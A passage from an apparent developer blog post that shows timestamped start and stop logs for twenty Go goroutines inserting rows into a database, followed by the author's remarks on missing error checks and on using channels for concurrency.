Gopher Id: 8 	|| StartTime: 2013-10-31 08:52:45.56084829 -0700 PDT
Gopher Id: 6 	|| StartTime: 2013-10-31 08:52:45.561137992 -0700 PDT
Gopher Id: 12 	|| StartTime: 2013-10-31 08:52:45.561215818 -0700 PDT
Gopher Id: 4 	|| StartTime: 2013-10-31 08:52:45.561288387 -0700 PDT
Gopher Id: 7 	|| StartTime: 2013-10-31 08:52:45.56135501 -0700 PDT
Gopher Id: 15 	|| StartTime: 2013-10-31 08:52:45.56148435 -0700 PDT
Gopher Id: 2 	|| StartTime: 2013-10-31 08:52:45.562015828 -0700 PDT
Gopher Id: 17 	|| StartTime: 2013-10-31 08:52:45.562434107 -0700 PDT
Gopher Id: 13 	|| StartTime: 2013-10-31 08:52:45.562872507 -0700 PDT
Gopher Id: 19 	|| StartTime: 2013-10-31 08:52:45.564599961 -0700 PDT
Gopher Id: 0 	|| StartTime: 2013-10-31 08:52:45.567561345 -0700 PDT
Gopher Id: 1 	|| StartTime: 2013-10-31 08:52:45.568002729 -0700 PDT
Gopher Id: 3 	|| StartTime: 2013-10-31 08:52:45.568259325 -0700 PDT
Gopher Id: 10 	|| StartTime: 2013-10-31 08:52:45.569216209 -0700 PDT
Gopher Id: 9 	|| StartTime: 2013-10-31 08:52:45.569317516 -0700 PDT
Gopher Id: 11 	|| StartTime: 2013-10-31 08:52:45.569604124 -0700 PDT
Gopher Id: 14 	|| StartTime: 2013-10-31 08:52:45.572600335 -0700 PDT
Gopher Id: 16 	|| StartTime: 2013-10-31 08:52:45.574639425 -0700 PDT
Gopher Id: 18 	|| StartTime: 2013-10-31 08:52:45.576122518 -0700 PDT
Gopher Id: 5 	|| StartTime: 2013-10-31 08:52:45.577174648 -0700 PDT
Gopher Id: 5 	|| StopTime: 2013-10-31 08:53:28.156243751 -0700 PDT
Gopher Id: 14 	|| StopTime: 2013-10-31 08:53:28.240175919 -0700 PDT
Gopher Id: 9 	|| StopTime: 2013-10-31 08:53:28.247910193 -0700 PDT
Gopher Id: 1 	|| StopTime: 2013-10-31 08:53:28.313724365 -0700 PDT
Gopher Id: 10 	|| StopTime: 2013-10-31 08:53:28.372717602 -0700 PDT
Gopher Id: 16 	|| StopTime: 2013-10-31 08:53:28.389852733 -0700 PDT
Gopher Id: 15 	|| StopTime: 2013-10-31 08:53:28.434203629 -0700 PDT
Gopher Id: 19 	|| StopTime: 2013-10-31 08:53:28.470070067 -0700 PDT
Gopher Id: 18 	|| StopTime: 2013-10-31 08:53:28.486355611 -0700 PDT
Gopher Id: 4 	|| StopTime: 2013-10-31 08:53:28.505530435 -0700 PDT
Gopher Id: 8 	|| StopTime: 2013-10-31 08:53:28.507830911 -0700 PDT
Gopher Id: 3 	|| StopTime: 2013-10-31 08:53:28.520788665 -0700 PDT
Gopher Id: 11 	|| StopTime: 2013-10-31 08:53:28.545292303 -0700 PDT
Gopher Id: 13 	|| StopTime: 2013-10-31 08:53:28.585376452 -0700 PDT
Gopher Id: 0 	|| StopTime: 2013-10-31 08:53:28.587530913 -0700 PDT
Gopher Id: 7 	|| StopTime: 2013-10-31 08:53:28.598791481 -0700 PDT
Gopher Id: 2 	|| StopTime: 2013-10-31 08:53:28.605832957 -0700 PDT
Gopher Id: 12 	|| StopTime: 2013-10-31 08:53:28.61655187 -0700 PDT
Gopher Id: 17 	|| StopTime: 2013-10-31 08:53:28.616684023 -0700 PDT
Gopher Id: 6 	|| StopTime: 2013-10-31 08:53:28.618116313 -0700 PDT

Something to call out, is that we are shoving our data, basically, into a black hole. We have no idea if the inserts completed successfully. Yes there is some error logic, but not enough. We are using Go to have our application function in a parallel state, or as Rob might say.

“The concurrent composition of 10 gophers inserting data into a database”

 

Rob in his talk, goes on to mention channels. Which is the logical next step for message passing here. This would bring our application into a concurrent state and if people are interested, hit me up @jaredfolkins and let me know I should post more concerning this.

Older Posts